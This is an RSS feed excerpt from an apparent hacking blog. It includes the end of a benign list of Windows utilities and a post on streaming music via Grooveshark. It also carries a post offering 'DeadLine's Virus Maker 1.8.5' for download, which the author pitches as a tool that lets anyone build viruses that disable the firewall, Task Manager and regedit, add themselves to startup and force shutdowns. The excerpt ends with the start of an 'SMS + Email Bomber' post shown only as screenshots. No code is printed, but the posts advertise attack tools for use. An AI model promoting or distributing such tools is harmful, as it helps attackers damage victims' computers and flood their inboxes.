&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--33_2PUsn--/1379693777574280262.jpg" data-chomp-id="1379693777574280262" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777574280262.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--33_2PUsn--/1379693777574280262.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;svg class="svg-icon svg-zoom-in"&gt;&lt;use xlink:href="http://lifehacker.com/top-10-incredibly-useful-windows-programs-to-have-on-ha-1584009886#iconset-zoom-in"&gt;&lt;/use&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div data-textannotation-id="44c28176cde83d2d6aa34f446198282e"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Ever had to reinstall a program, but couldn’t find your product key? &lt;a href="http://www.magicaljellybean.com/keyfinder/" target="_blank"&gt;Magical Jelly Bean KeyFinder&lt;/a&gt; will &lt;a href="http://lifehacker.com/magical-jelly-bean-keyfinder-finds-product-keys-for-all-1488686776"&gt;search your PC for installed programs&lt;/a&gt;,
 and—if they have a product key—show them to you, so you can write it 
down and use it the next time you reinstall. Note: this one contains 
some toolbars and such upon installation, so be sure to use the custom 
installation to avoid the crapware.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;h3 data-textannotation-id="3cd7ef3c0d8306788809c5ba0d39e58f"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;5. Process Explorer&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="f59fb882eabb92078fd5848f09956d31"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--C6sU8ZTy--/1379693777612399942.jpg" data-chomp-id="1379693777612399942" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777612399942.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--C6sU8ZTy--/1379693777612399942.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="f59fb882eabb92078fd5848f09956d31"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="f59fb882eabb92078fd5848f09956d31"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;The Windows
 Task Manager can show you a lot of information about what programs are 
running, and usually it does what you need it to. But on the rare 
occasions you need more information—like if you’re trying to figure out which program is using your webcam, for example—you need &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" target="_blank"&gt;Process Explorer&lt;/a&gt;. Process Explorer is one of the many Task Manager alternatives
 out there, offering information on what files are currently in use, 
what hardware, and what each program is doing. If the regular Task 
Manager isn’t giving you the info you need, Process Explorer will.










&lt;/span&gt;&lt;/div&gt;
&lt;aside class="referenced-wide referenced-fullwidth js_inset tmpl_referencedGroupFullWidth clearfix core-decorated-inset"&gt;
    &lt;div class="container"&gt;
        
            
    &lt;div class="referenced-item " data-inset-id="1558627056"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/aside&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;


























&lt;/span&gt;&lt;h3 data-textannotation-id="5039e391275c432044e23e8ccc9211fd"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;4. UNetbootin and YUMI&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="b0c50f52531125b8c1073e98839d8864"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--XkL3ImWL--/1379693777663235398.jpg" data-chomp-id="1379693777663235398" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777663235398.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--XkL3ImWL--/1379693777663235398.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="b0c50f52531125b8c1073e98839d8864"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="b0c50f52531125b8c1073e98839d8864"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Even if you’re a diehard Windows user, Linux can be really useful from time to time—especially
 for troubleshooting. Traditionally, Linux distros and other 
troubleshooting tools come in the form of live CDs, but if you don’t 
have a CD drive, &lt;a href="http://unetbootin.sourceforge.net/" target="_blank"&gt;UNetbootin&lt;/a&gt; is a seriously handy tool. It can turn nearly any ISO into a bootable flash drive. Even better is &lt;a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/" target="_blank"&gt;YUMI&lt;/a&gt;, which lets you put multiple live CDs on one flash drive—meaning you can combine all your favorite rescue discs, Linux distros, and other tools and put them in your pocket.





































&lt;/span&gt;&lt;/div&gt;
&lt;h3 data-textannotation-id="842068345049446d07c400288aac6114"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;3. Wireless Network Watcher (and Other Network Tools)&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="53d34944529d14b7abeaae1551fdb6a8"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--4ztp4yRl--/1379693777848396614.jpg" data-chomp-id="1379693777848396614" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777848396614.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--4ztp4yRl--/1379693777848396614.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="53d34944529d14b7abeaae1551fdb6a8"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Need to see
 a list of all the computers on your network, along with IP addresses, 
MAC addresses, and other information? Whether you’re planning your network or think someone’s stealing your Wi-Fi, Wireless Network Watcher
 is a handy tool to have around. Despite its name, it works over wired 
networks, too. Of course, we also recommend checking out all of NirSoft’s network tools—which one you use depends on what you’re trying to troubleshoot, but they’re all pretty awesome.










&lt;/span&gt;&lt;/div&gt;
&lt;aside class="referenced-wide referenced-fullwidth js_inset tmpl_referencedGroupFullWidth clearfix core-decorated-inset"&gt;
    &lt;div class="container"&gt;
        
            
    &lt;div class="referenced-item " data-inset-id="1555982641"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
    

    &lt;/div&gt;
&lt;/div&gt;
&lt;/aside&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;


























&lt;/span&gt;&lt;h3 data-textannotation-id="0eabe521c7f5abcfa5cf82397131fe72"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;2. WinDirStat&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="fb6c3d308f8f8fefbc5e47372ff49a70"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--0NsTpyX1--/1379693777886809670.jpg" data-chomp-id="1379693777886809670" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777886809670.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--0NsTpyX1--/1379693777886809670.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="fb6c3d308f8f8fefbc5e47372ff49a70"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;We all 
reach that fateful day at some point: when your computer tells you its 
running out of space. Not sure where it’s all going? &lt;a href="http://windirstat.info/index.html" target="_blank"&gt;WinDirStat&lt;/a&gt; will tell you.
 It scans all of your disks and shows you the biggest folders, which 
file types are taking up space, and more. If you’ve tried the usual 
things (like Disk Cleanup) and are still coming up short, WinDirStat is 
the next step in the disk cleaning process.








&lt;/span&gt;&lt;/div&gt;
&lt;h3 data-textannotation-id="b8231887c3e3ac8c974d89172c701889"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;1. Sandboxie&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;








&lt;/span&gt;&lt;div class="has-media media-640 has-image" data-textannotation-id="c99e96c3b48e82a2af726e3dd66572e4"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="lightBoxWrapper"&gt;&lt;span class="img-border"&gt;&lt;img alt="Top 10 Incredibly Useful Windows Programs to Have On Hand" class="js_annotatable-image cursor-crosshair" data-asset-url="http://i.kinja-img.com/gawker-media/image/upload/s--RNS9-jMm--/1379693777936746054.jpg" data-chomp-id="1379693777936746054" data-format="jpg" data-original-src="https://i.kinja-img.com/gawker-media/image/upload/1379693777936746054.jpg" height="358" src="http://i.kinja-img.com/gawker-media/image/upload/s--RNS9-jMm--/1379693777936746054.jpg" width="636" /&gt;&lt;/span&gt;&lt;span class="magnifier lightBox"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="c99e96c3b48e82a2af726e3dd66572e4"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="has-media media-640 has-image" data-textannotation-id="c99e96c3b48e82a2af726e3dd66572e4"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Let’s admit
 it: sometimes, even though we know it’s wrong, we all open the 
occasional sketchy program or file. We’re not judging, but if you’re 
going to do it, at least use protection. Enter &lt;a href="http://www.sandboxie.com/index.php?DownloadSandboxie" target="_blank"&gt;Sandboxie&lt;/a&gt;, which lets you run programs independent of the rest of your system.
 That way they can’t infect, access, or otherwise interfere with your 
Windows installation. It’s also great for testing apps you aren’t sure 
of or running multiple instances of an app that won’t let you, so it’s 
fun for the whole family.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description></item><item><title>How To Listen To Any Music For Free Online ? </title><link>http://superhackings.blogspot.com/2015/08/how-to-listen-to-any-music-for-free.html</link><category>Entertainment</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Thu, 20 Aug 2015 23:43:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-4856673481576297075</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://janekgwizdala.com/home/wp-content/uploads/free-Music-Online.gif" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="How To Listen To Any Music For Free Online ?" border="0" src="http://janekgwizdala.com/home/wp-content/uploads/free-Music-Online.gif" height="160" title="How To Listen To Any Music For Free Online ?" width="200" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Everyone likes to listen to music.Music refreshes us,inspires us and 
make us happy.There are several ways to listen to music.But most of them
 are not free.You can use youtube to watch music videos.But it takes a 
lot of time to load youtube videos just for us to listen to music.This 
is not a trick to speed up youtube buffering
 but this is a trick to listen to free music online.There are a lot of 
music streaming services such as Pandora,Spotify,etc. .Even Apple has 
started iTunes Radio for free music.Even though this is free these are 
not available in every country.Here is a trick to listen to any music 
for free all over the world.&lt;br /&gt;
&lt;a href="https://www.blogger.com/null" name="more"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Steps To Listen To Any Music For Free&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;
&lt;div&gt;
&lt;ol style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Go to &lt;a href="http://grooveshark.com/" rel="nofollow" target="_blank"&gt;grooveshark.com&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;In the search box enter the music that you want to listen and hit enter.&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH08FRQNgHK0-jXnufiUmMHSCouVau9hP-q9JQd1HA9xaFXTYCQEJZ6_eBU4DUaRnOW2THHqE08lJBWyGBznmueNvtlcLvbJ3okMmVdMHYP8kYLCz_EHoHPbLGtpK2rqLH8i2VoReJUjw/s1600/free+music-1.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Search music in grooveshark" border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH08FRQNgHK0-jXnufiUmMHSCouVau9hP-q9JQd1HA9xaFXTYCQEJZ6_eBU4DUaRnOW2THHqE08lJBWyGBznmueNvtlcLvbJ3okMmVdMHYP8kYLCz_EHoHPbLGtpK2rqLH8i2VoReJUjw/s1600/free+music-1.jpg" title="Search music in grooveshark" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Hit play.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Drag more songs to the queue for continuous listening experience.&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrzQ6xIXO82ivrwVA8VBCwm1k8CzPBTHmihgramRBmYcbQSYCVR5z7lIHpDuhL17gBNYh_60jlZNukyaweIBxLGj1rdebFQFwhbG7_TJHO8xCli3VhlCyg3mBWI5ESWjIqaQ0UWTF4vUo/s1600/free+music-2.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Listen music for free" border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrzQ6xIXO82ivrwVA8VBCwm1k8CzPBTHmihgramRBmYcbQSYCVR5z7lIHpDuhL17gBNYh_60jlZNukyaweIBxLGj1rdebFQFwhbG7_TJHO8xCli3VhlCyg3mBWI5ESWjIqaQ0UWTF4vUo/s1600/free+music-2.jpg" title="Listen music for free" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 style="text-align: left;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
How is the audio quality?&lt;/span&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;
&lt;div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
The audio quality is not bad.However since these are uploaded by various
 users,the quality may vary.You may experience lower quality if you are 
using earphones.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;
&lt;h4 style="text-align: left;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Can I download them?&lt;/span&gt;&lt;/h4&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;
&lt;div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
You cannot directly download the music but you can do that by 3rd party softwares.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH08FRQNgHK0-jXnufiUmMHSCouVau9hP-q9JQd1HA9xaFXTYCQEJZ6_eBU4DUaRnOW2THHqE08lJBWyGBznmueNvtlcLvbJ3okMmVdMHYP8kYLCz_EHoHPbLGtpK2rqLH8i2VoReJUjw/s72-c/free+music-1.jpg" width="72"/></item><item><title>DeadLine's Virus Maker 1.8.5(Free Download) </title><link>http://superhackings.blogspot.com/2015/08/deadlines-virus-maker-185free-download.html</link><category>Free Download</category><category>Malware Source</category><category>software</category><category>Virus</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Thu, 20 Aug 2015 20:06:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-8884929688210332074</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="post-body"&gt;
&lt;div dir="ltr" style="text-align: left;"&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Hello !&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;
DeadLine's Virus Maker 1.8.5 is a virus maker that I made because I do 
not trust all the other virus makers that are out there on the net. I 
worked on this for 8+ hours in total.&lt;br /&gt;
This application lets you create virusses, and you do not need to be a computer "geek" to do this. All you need, is this tool.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;Features:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="spoiler_header"&gt;
&lt;/div&gt;
&lt;div class="spoiler_body" style="display: block;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
* Show a messagebox on startup&lt;br /&gt;
* Add to windows startup&lt;br /&gt;
* Close MSN&lt;br /&gt;
* Close Skype&lt;br /&gt;
* Close Yahoo&lt;br /&gt;
* Disable mouse&lt;br /&gt;
* Force shutdown&lt;br /&gt;
* Force restart&lt;br /&gt;
* Infinite beeping&lt;br /&gt;
* Infinite messageboxes&lt;br /&gt;
* Disconnect from the internet&lt;br /&gt;
* Disable firewall&lt;br /&gt;
* Disable CMD&lt;br /&gt;
* Disable taskmanager&lt;br /&gt;
* Disable regedit&lt;br /&gt;
* Random mouse movement&lt;br /&gt;
* Random keyboard keys sent&lt;br /&gt;
* Disable notepad&lt;br /&gt;
* And more !&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;Screenshot:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRd8ntwC9-dNOQSFjbKj_B6K8siuJP0M7-DpYROgD1xuOxMmXzU1gwM6moCMlryC3ErP-_UDPdBktvDe3Re-S_OG3oDRKAmbLiw6YvqEgD5aDj6-KgYTpElk54n0KoFC-aCnUI_o4cTH4/s1600/dvm.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRd8ntwC9-dNOQSFjbKj_B6K8siuJP0M7-DpYROgD1xuOxMmXzU1gwM6moCMlryC3ErP-_UDPdBktvDe3Re-S_OG3oDRKAmbLiw6YvqEgD5aDj6-KgYTpElk54n0KoFC-aCnUI_o4cTH4/s1600/dvm.png" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;a href="http://adf.ly/KteSt" target="_blank"&gt;DOWNLOAD&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Credit:&lt;i&gt;DeadLine From HF&lt;/i&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRd8ntwC9-dNOQSFjbKj_B6K8siuJP0M7-DpYROgD1xuOxMmXzU1gwM6moCMlryC3ErP-_UDPdBktvDe3Re-S_OG3oDRKAmbLiw6YvqEgD5aDj6-KgYTpElk54n0KoFC-aCnUI_o4cTH4/s72-c/dvm.png" width="72"/></item><item><title>USA+International Free SMS + Email Bomber</title><link>http://superhackings.blogspot.com/2015/08/usainternational-free-sms-email-bomber.html</link><category>Free Download</category><category>Free SMS</category><category>Gmail Hacks .Email Hacking</category><category>software</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Thu, 20 Aug 2015 19:44:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-1307373138042593234</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;SCREEN SHOT: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVhTIX5EKMSPHDnskvIbquroNCKhWR-k78fViKctrJRUoIa9YPPf70ZN88ZrVp-wIUH0GxY0d34IOqXvzz3UMbgW8F8rnk2Q8-goJolqwggDUUfxBto8u7xkwvyEuAVmhaantcqaKyaBQ/s1600/load_Emails.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVhTIX5EKMSPHDnskvIbquroNCKhWR-k78fViKctrJRUoIa9YPPf70ZN88ZrVp-wIUH0GxY0d34IOqXvzz3UMbgW8F8rnk2Q8-goJolqwggDUUfxBto8u7xkwvyEuAVmhaantcqaKyaBQ/s320/load_Emails.jpg" width="238" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQSwnIgEo5YgZMolEe3WvtjSHrx501u881h49HPZiTK7qTGE8QvmjPWmkLxAi3ZCsT9is1hhhTD4efeY6LutlS78lTuEPOurgGGDCp8lnUh7WQcR-NSNPcgh5WvSmSDyetjkmTLlInIa4/s1600/load_Victs.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQSwnIgEo5YgZMolEe3WvtjSHrx501u881h49HPZiTK7qTGE8QvmjPWmkLxAi3ZCsT9is1hhhTD4efeY6LutlS78lTuEPOurgGGDCp8lnUh7WQcR-NSNPcgh5WvSmSDyetjkmTLlInIa4/s320/load_Victs.jpg" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCgCUQNoh4pn_74hHoVnkfiuyxNLPx9L8N7n8FkR-ww_nAl8Y5X4mcy_BRZxu6dpw-Y46QZywj5tKudPO-t2yU2vcNGBJlfUgNVgGgKho87B03XdXp-mZwyshD2N6zI01FKUOlrvz9DYU/s1600/overview.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCgCUQNoh4pn_74hHoVnkfiuyxNLPx9L8N7n8FkR-ww_nAl8Y5X4mcy_BRZxu6dpw-Y46QZywj5tKudPO-t2yU2vcNGBJlfUgNVgGgKho87B03XdXp-mZwyshD2N6zI01FKUOlrvz9DYU/s320/overview.jpg" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
